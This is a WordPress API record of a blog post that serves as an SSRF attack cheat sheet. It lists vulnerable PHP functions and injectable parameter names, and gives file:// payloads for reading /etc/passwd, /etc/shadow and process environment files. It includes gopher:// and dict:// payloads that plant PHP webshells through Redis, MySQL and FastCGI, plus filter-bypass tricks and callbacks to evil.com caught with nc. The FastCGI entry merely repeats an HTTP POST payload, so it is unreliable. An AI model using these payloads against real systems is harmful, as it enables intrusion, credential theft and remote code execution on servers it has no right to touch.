{"id":71,"date":"2026-03-14T22:34:52","date_gmt":"2026-03-14T14:34:52","guid":{"rendered":"http:\/\/47.118.30.30\/?p=71"},"modified":"2026-03-15T11:40:26","modified_gmt":"2026-03-15T03:40:26","slug":"ssrf","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/03\/14\/ssrf\/","title":{"rendered":"ssrf"},"content":{"rendered":"<h1><strong>SSRF<\/strong><\/h1>\n<p>Concept: through this vulnerability an attacker can make a server-side application issue forged requests. In general, the target of an SSRF attack is an internal system that cannot be reached from the Internet. Because the request originates from the server, it can reach the intranet that is connected to the server but isolated from the outside. In other words, a service that makes network requests can be used as a pivot for attacks, which bypasses security controls that rely on network topology.<\/p>\n<h3>Injection points:<\/h3>\n<pre><code>Look for these URL parameter names: share, wap, url, link, src, source, target, u, 3g, display, sourceURl, imageURL, domain.\n\nEntry functions:\nfile_get_contents(): fetches the content of a given URL, then saves it under a specified file name and shows it to the user; it writes a string into a file. If the user controls the URL parameter, an attacker can craft a malicious URL that makes the server access intranet services, read local files or attack other servers.\n\/\/http:\/\/example.com\/ssrf.php?url=file:\/\/\/etc\/passwd\n\/\/http:\/\/example.com\/ssrf.php?url=http:\/\/192.168.1.100:6379\n\nfsockopen(): opens a network connection or a Unix socket connection. If the user controls the hostname and port parameters, an attacker can use it to reach intranet services or local resources.\n\/\/http:\/\/example.com\/ssrf.php?host=192.168.1.100&amp;port=22\n\ncurl_exec(): executes a cURL session. If the user controls the URL parameter, an attacker can use it to access intranet services, read local files or attack other servers.\n\/\/http:\/\/example.com\/ssrf.php?url=http:\/\/192.168.1.100:6379\n\/\/http:\/\/example.com\/ssrf.php?url=gopher:\/\/127.0.0.1:6379\/_POST%20\/ssrf.php%20HTTP\/1.1%0d%0aHost:%20127.0.0.1%0d%0a<\/code><\/pre>\n<h3>Exploitation:<\/h3>\n<p>Intranet access:<\/p>\n<pre><code>?url=http:\/\/127.0.0.1\/flag.php<\/code><\/pre>\n<p>Reading files via pseudo-protocols:<\/p>\n<pre><code>?url=file:\/\/\/var\/www\/html\/flag.php<\/code><\/pre>\n<p>Port scanning:<\/p>\n<pre><code>?url=dict:\/\/127.0.0.1:8000<\/code><\/pre>\n<p>Sending a POST request to attack an intranet application:<\/p>\n<pre><code>?url=gopher:\/\/127.0.0.1:80\/_POST%20\/flag.php%20HTTP\/1.1%0D%0AHost:%20127.0.0.1%0D%0AContent-Type:%20application\/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=a68a3b03e80ce7fef96007dfa01dc077<\/code><\/pre>\n<p>Attacking the FastCGI protocol for code execution:<\/p>\n<pre><code>?url=gopher:\/\/127.0.0.1:80\/_POST%20\/flag.php%20HTTP\/1.1%0D%0AHost:%20127.0.0.1%0D%0AContent-Type:%20application\/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=a68a3b03e80ce7fef96007dfa01dc077<\/code><\/pre>\n<p>Attacking a Redis service for code execution:<\/p>\n<pre><code>?url=gopher:\/\/127.0.0.1:6379\/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A\/var\/www\/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A<\/code><\/pre>\n<h3>Bypasses:<\/h3>\n<p>IP format conversion:<\/p>\n<pre><code>127.0.0.1\nOctal: 0177.0.0.1\nHexadecimal: 0x7f.0.0.1\nDecimal: 2130706433<\/code><\/pre>\n<p>@:<\/p>\n<pre><code>http:\/\/8.8.8.8@127.0.0.1:8080       \/\/the part before @ is treated as userinfo and ignored\nhttp:\/\/127.0.0.1#8.8.8.8       \/\/the part after # is a URL fragment and is not sent<\/code><\/pre>\n<p>Using [::]:<\/p>\n<pre><code>The IPv6 address ::1 can also denote localhost\nhttp:\/\/[::1]:80\/ or http:\/\/[::]:80\/ can be resolved as localhost, bypassing filters on 127.0.0.1.<\/code><\/pre>\n<p>Using URL shorteners:<\/p>\n<p>URL shortening services compress a long URL into a short one for quick access. In SSRF exploitation, an attacker can hide the target address (such as an intranet service address) behind a short URL, bypassing the target server's filtering of specific URLs.<\/p>\n<p>Using special domain names:<\/p>\n<p>This relies on DNS resolution. xip.io can point to any domain name.<\/p>\n<pre><code>127.0.0.1.xip.io resolves to 127.0.0.1<\/code><\/pre>\n<p>Using ideographic full stops:<\/p>\n<pre><code>127\u30020\u30020\u30021 &gt;&gt;&gt; 127.0.0.1<\/code><\/pre>\n<p>302 redirects:<\/p>\n<p>A 302 redirect can send the target server's request on to an intranet address or another restricted address, bypassing filtering of specific URLs.<\/p>\n<p>DNS rebinding:<\/p>\n<p>(omitted)<\/p>\n<p>Using enclosed alphanumerics:<\/p>\n<p>Enclosed Alphanumerics are a block of special Unicode characters that browsers or parsers, in some cases, normalize to ordinary alphanumeric characters. They can be used to bypass filtering of specific domain names or IP addresses.<\/p>\n<pre><code>\u24d4\u24e7\u24d0\u24dc\u24df\u24db\u24d4.\u24d2\u24de\u24dc &gt;&gt;&gt; example.com\nhttp:\/\/127.0.0.1 &gt;&gt;&gt; http:\/\/\u2460\u2461\u2466\uff61\u24ea\u3002\u24ea\u3002\u2460\nList: \u2460 \u2461 \u2462 \u2463 \u2464 \u2465 \u2466 \u2467 \u2468 \u2469 \u246a \u246b \u246c \u246d \u246e \u246f \u2470 \u2471 \u2472 \u2473 \u2474 \u2475 \u2476 \u2477 \u2478 \u2479 \u247a \u247b \u247c \u247d \u247e \u247f \u2480 \u2481 \u2482 \u2483 \u2484 \u2485 \u2486 \u2487 \u2488 \u2489 \u248a \u248b \u248c \u248d \u248e \u248f \u2490 \u2491 \u2492 \u2493 \u2494 \u2495 \u2496 \u2497 \u2498 \u2499 \u249a \u249b \u249c \u249d \u249e \u249f \u24a0 \u24a1 \u24a2 \u24a3 \u24a4 \u24a5 \u24a6 \u24a7 \u24a8 \u24a9 \u24aa \u24ab \u24ac \u24ad \u24ae \u24af \u24b0 \u24b1 \u24b2 \u24b3 \u24b4 \u24b5 \u24b6 \u24b7 \u24b8 \u24b9 \u24ba \u24bb \u24bc \u24bd \u24be \u24bf \u24c0 \u24c1 \u24c2 \u24c3 \u24c4 \u24c5 \u24c6 \u24c7 \u24c8 \u24c9 \u24ca \u24cb \u24cc \u24cd \u24ce \u24cf \u24d0 \u24d1 \u24d2 \u24d3 \u24d4 \u24d5 \u24d6 \u24d7 \u24d8 \u24d9 \u24da \u24db \u24dc \u24dd \u24de \u24df \u24e0 \u24e1 \u24e2 \u24e3 \u24e4 \u24e5 \u24e6 \u24e7 \u24e8 \u24e9 \u24ea \u24eb \u24ec \u24ed \u24ee \u24ef \u24f0 \u24f1 \u24f2 \u24f3 \u24f4 \u24f5 \u24f6 \u24f7 \u24f8 \u24f9 \u24fa \u24fb \u24fc \u24fd \u24fe \u24ff<\/code><\/pre>\n<h3>More pseudo-protocols:<\/h3>\n<pre><code>file:\/\/\/ reads file content from the file system, e.g. file:\/\/\/etc\/passwd\ndict:\/\/ dictionary server protocol, accesses dictionary resources, e.g. dict:\/\/\/ip:6739\/info\nsftp:\/\/ SSH File Transfer Protocol or Secure File Transfer Protocol\nldap:\/\/ Lightweight Directory Access Protocol\ntftp:\/\/ Trivial File Transfer Protocol\ngopher:\/\/ distributed document delivery service; gopherus can generate payloads<\/code><\/pre>\n<p>file:<\/p>\n<pre><code>http:\/\/example.com\/ssrf.php?url=file:\/\/\/etc\/passwd\nhttp:\/\/example.com\/ssrf.php?url=file:\/\/\/C:\/Windows\/win.ini\n\nPath traversal: combine with path traversal to reach arbitrary files\nhttp:\/\/target.com\/fetch?url=file:\/\/\/var\/www\/html\/..\/..\/..\/etc\/shadow\n\nSpecial files: read special files to obtain system information\nhttp:\/\/target.com\/fetch?url=file:\/\/\/proc\/self\/environ\nhttp:\/\/target.com\/fetch?url=file:\/\/\/proc\/self\/cmdline\n\nDirectory listing: some implementations may allow listing directory contents\nhttp:\/\/target.com\/fetch?url=file:\/\/\/var\/www\/html\/<\/code><\/pre>\n<p>dict:<\/p>\n<p>This URL scheme references definitions or word lists made available through the DICT protocol:<\/p>\n<pre><code>dict:\/\/ is a TCP-based dictionary lookup protocol defined in RFC 2229 (1997); clients use it to query a dictionary server for word definitions, synonyms, parts of speech and other linguistic information\nFormat: dict:\/\/&lt;host&gt;[:&lt;port&gt;]\/[&lt;database&gt;:]&lt;word&gt;\n\ndict:\/\/127.0.0.1:22\/: if an SSH banner (e.g. SSH-2.0-OpenSSH) comes back, SSH is open\n\ndict:\/\/127.0.0.1:25\/: returns 220 mail.example.com \u2192 a mail service is present\n\ndict:\/\/127.0.0.1:6379\/: returns -ERR unknown command 'CLIENT' \u2192 confirms Redis\n\ndict:\/\/127.0.0.1:3306\/: returns a MySQL protocol packet (garbled bytes) \u2192 MySQL is open\n\ndict:\/\/192.168.1.100:8080\/: if an HTTP response comes back \u2192 an internal admin panel is present\n\nhttp:\/\/example.com\/ssrf.php?dict:\/\/evil.com:1337\/: makes the server connect to the corresponding port on the attacker's machine\nnc shows:\n$ nc -lvp 1337\nConnection from [192.168.0.12] port 1337[tcp\/*]\naccepted (family 2, sport 31126)CLIENT libcurl 7.40.0\n\nRedis command execution: interact with a Redis service over the dict protocol\nhttp:\/\/target.com\/fetch?url=dict:\/\/192.168.1.10:6379\/info       \/\/info retrieves server information\nhttp:\/\/target.com\/fetch?url=dict:\/\/192.168.1.10:6379\/CONFIG SET dir \/var\/www\/html\/\nhttp:\/\/target.com\/fetch?url=dict:\/\/192.168.1.10:6379\/SET webshell \"&lt;?php @eval($_POST['cmd']); ?&gt;\"\n\nMemcached data extraction: query a Memcached service for cached data\nhttp:\/\/target.com\/fetch?url=dict:\/\/192.168.1.10:11211\/stats<\/code><\/pre>\n<p>sftp:<\/p>\n<pre><code>SSH File Transfer Protocol, or Secure File Transfer Protocol: a separate protocol bundled with SSH that runs over a secure connection and works in a similar way.\n\nFormat: sftp:\/\/[user[:pass]@]host[:port]\/path\nExample: sftp:\/\/admin:123456@192.168.1.100:22\/etc\/passwd\n\nsftp:\/\/127.0.0.1:22\/: if an SSH banner (e.g. SSH-2.0-OpenSSH) comes back \u2192 SSH is open\n\nhttp:\/\/example.com\/ssrf.php?url=sftp:\/\/evil.com:1337\/\nevil.com:$ nc -lvp 1337\nConnection from [192.168.0.12] port 1337[tcp\/*]\naccepted (family 2, sport 37146)SSH-2.0-libssh2_1.4.2<\/code><\/pre>\n<p>ldap:\/\/, ldaps:\/\/ or ldapi:\/\/:<\/p>\n<pre><code>LDAP stands for Lightweight Directory Access Protocol and is commonly used for authentication. It is an application protocol for managing and accessing distributed directory information services over IP networks.\n\nldap:\/\/: port 389\nldaps:\/\/: port 636\n\nhttp:\/\/example.com\/ssrf.php?url=ldap:\/\/192.168.1.10:389\/: checks whether Active Directory exists on the intranet\n\nldap:\/\/dc.internal:389\/cn=admin,dc=example,dc=com?cn: attempts to read an LDAP entry\n\nhttp:\/\/example.com\/ssrf.php?url=ldap:\/\/localhost:1337\/%0astats%0aquit\nhttp:\/\/example.com\/ssrf.php?url=ldaps:\/\/localhost:1337\/%0astats%0aquit\nhttp:\/\/example.com\/ssrf.php?url=ldapi:\/\/localhost:1337\/%0astats%0aquit\n\/\/confirms that port 1337 is open; real Memcached commands are then sent with gopher:\/\/\n\nLDAP injection: combine with LDAP injection to obtain directory information\nhttp:\/\/target.com\/fetch?url=ldap:\/\/192.168.1.10:389\/dc=example,dc=com??sub?(uid=*)\n\nLDAP bind: try binding with different credentials<\/code><\/pre>\n<p>tftp:\/\/:<\/p>\n<pre><code>tftp:\/\/: used for (limited) intranet file reads and service probing, but constrained by the simplicity of TFTP itself and its lack of authentication.\n\nhttp:\/\/example.com\/ssrf.php?url=tftp:\/\/192.168.1.100\/running-config: if the file exists and is readable \u2192 its content is echoed to the page\n\nhttp:\/\/example.com\/ssrf.php?url=tftp:\/\/evil.com:1337\/TESTUDPPACKET: makes the server connect out to evil.com:1337\n<\/code><\/pre>\n<p>gopher:\/\/:<\/p>\n<pre><code>gopher:\/\/: a distributed document delivery service that lets users seamlessly browse, search and retrieve information held in different locations. It can carry an arbitrary TCP payload\n\nFormat: gopher:\/\/&lt;host&gt;:&lt;port&gt;\/_&lt;URL_ENCODED_RAW_TCP_PAYLOAD&gt;\n\/\/_ is the gopher \"request type\" selector (type=1 means text is returned)\n\/\/&lt;payload&gt; is the URL-encoded raw TCP stream\n\/\/line breaks must be encoded as %0D%0A (\\r\\n)\n\ngopher:\/\/127.0.0.1:6379\/_SET%20webshell%20%22%5Cn%3C%3Fphp%20system%28%24_REQUEST%5B%27cmd%27%5D%29%3B%3F%3E%22%0D%0ACONFIG%20SET%20dir%20%2Fvar%2Fwww%2Fhtml%0D%0ACONFIG%20SET%20dbfilename%20shell.php%0D%0ASAVE%0D%0A\n\/\/sends these Redis commands:\n\/\/SET webshell \"\\n&lt;?php system($_REQUEST['cmd']);?&gt;\"\n\/\/CONFIG SET dir \/var\/www\/html\n\/\/CONFIG SET dbfilename shell.php\n\/\/SAVE\nor\nhttp:\/\/target.com\/fetch?url=gopher:\/\/192.168.1.10:6379\/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A\/var\/www\/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A\n\/\/writes a webshell into the web root\n\ngopher:\/\/127.0.0.1:9000\/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20\/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP\/1.1%0E%03CONTENT_LENGTH999%0E%04REQUEST_METHODPOST%09%4BPHP_VALUEauto_prepend_file%3Dphp%3A\/\/input%0F%17SCRIPT_FILENAME\/var\/www\/html\/index.php%0D%01DOCUMENT_ROOT\/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%03%EB%04%00%3C%3Fphp%20system%28%22id%22%29%3Bdie%28%22-----Made-by-SpyD3r-----%5Cn%22%29%3B%3F%3E%00%00%00%00\n\/\/overrides configuration via PHP_VALUE and executes php:\/\/input\n\/\/system(\"id\") can be replaced with any command\n\ngopher:\/\/127.0.0.1:3306\/_%00%00%00%01%85%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%14%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%0......(a large number of authentication packets omitted here)......%00%00%00%03%73%65%6c%65%63%74%20%27%3C%3F%70%68%70%20%73%79%73%74%65%6d%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%6d%79%73%71%6c%2e%70%68%70%27%3b%00%00%00%00\n\/\/writes a webshell to \/var\/www\/html\/mysql.php\n\/\/requires MySQL root privileges and an empty secure_file_priv\n\ngopher:\/\/127.0.0.1:5000\/_GET%20\/%20HTTP\/1.1%0D%0AHost%3A%20127.0.0.1%3A5000%0D%0AUser-Agent%3A%20ssrf-test%0D%0AAccept%3A%20*\/*%0D%0A%0D%0A\n\/\/GET \/ HTTP\/1.1\n\/\/Host: 127.0.0.1:5000\n\/\/User-Agent: ssrf-test\n\/\/Accept: *\/*\n\nSMTP mail sending: send mail through an SMTP service\nhttp:\/\/target.com\/fetch?url=gopher:\/\/192.168.1.10:25\/xHELO%20localhost%0D%0AMAIL%20FROM%3A%3Cattacker%40example.com%3E%0D%0ARCPT%20TO%3A%3Cvictim%40example.com%3E%0D%0ADATA%0D%0ASubject%3A%20Test%0D%0AThis%20is%20a%20test%0D%0A.%0D%0AQUIT\n<\/code><\/pre>\n<p>ftp:<\/p>\n<pre><code>Used to interact with an FTP server:\nhttp:\/\/target.com\/fetch?url=ftp:\/\/user:pass@192.168.1.10\/\n\nFTP active mode: in some cases FTP active mode can be used for port scanning\n\nFTP command injection: some implementations may be susceptible to FTP command injection<\/code><\/pre>\n<p>Others:<\/p>\n<pre><code>jar protocol: accesses Java archive files\nhttp:\/\/target.com\/fetch?url=jar:http:\/\/attacker.com\/malicious.jar!\/\n\nnetdoc protocol: Java-specific, can be used for file access\nhttp:\/\/target.com\/fetch?url=netdoc:\/etc\/passwd\n\ndata protocol: embeds data directly in the URL\nhttp:\/\/target.com\/fetch?url=data:text\/plain,Hello%20World<\/code><\/pre>\n<h3>Protocol filter bypasses:<\/h3>\n<p><strong>Protocol nesting<\/strong>: nest another protocol inside an allowed one:<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/evil.com\/file.php?url=file:\/\/\/etc\/passwd<\/code><\/pre>\n<p><strong>URL redirection<\/strong>: use a redirect to jump from http to another protocol:<\/p>\n<pre><code># evil.com is configured to redirect to file:\/\/\/etc\/passwd\nhttp:\/\/target.com\/fetch?url=http:\/\/evil.com\/redirect<\/code><\/pre>\n<p><strong>Mixed-case scheme<\/strong>: some parsers treat the scheme case-insensitively:<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=Http:\/\/internal\/\nhttp:\/\/target.com\/fetch?url=https:\/\/internal\/<\/code><\/pre>\n<p><strong>Protocol-relative URL<\/strong>: a protocol-relative URL (\/\/) inherits the current page's scheme:<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=\/\/internal\/<\/code><\/pre>\n<h3>Filter bypass techniques:<\/h3>\n<p><strong>Double URL encoding<\/strong>: bypasses filters that decode only once:<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/%252F%252Finternal\/<\/code><\/pre>\n<p><strong>Null byte injection<\/strong>: in some language runtimes a null byte truncates the string:<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/allowed-domain.com%00internal\/<\/code><\/pre>\n<p><strong>Path normalization differences<\/strong>: exploit differences in how systems normalize paths:<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/internal\/.\/.\/.\/admin<\/code><\/pre>\n<p><strong>Parameter pollution<\/strong>: supply several parameters with the same name to confuse the filter logic:<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/allowed.com&amp;url=http:\/\/internal\/<\/code><\/pre>\n<p><strong>HTTP header injection<\/strong>: in some implementations, injected HTTP headers can influence the request target:<\/p>\n<pre><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>SSRF Concept: through this vulnerability an attacker can make a server-side application issue forged requests. In general, the target of an SSRF attack is an internal system that cannot be reached from the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-71","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/71","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/71\/revisions"}],"predecessor-version":[{"id":98,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/71\/revisions\/98"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=71"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=71"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}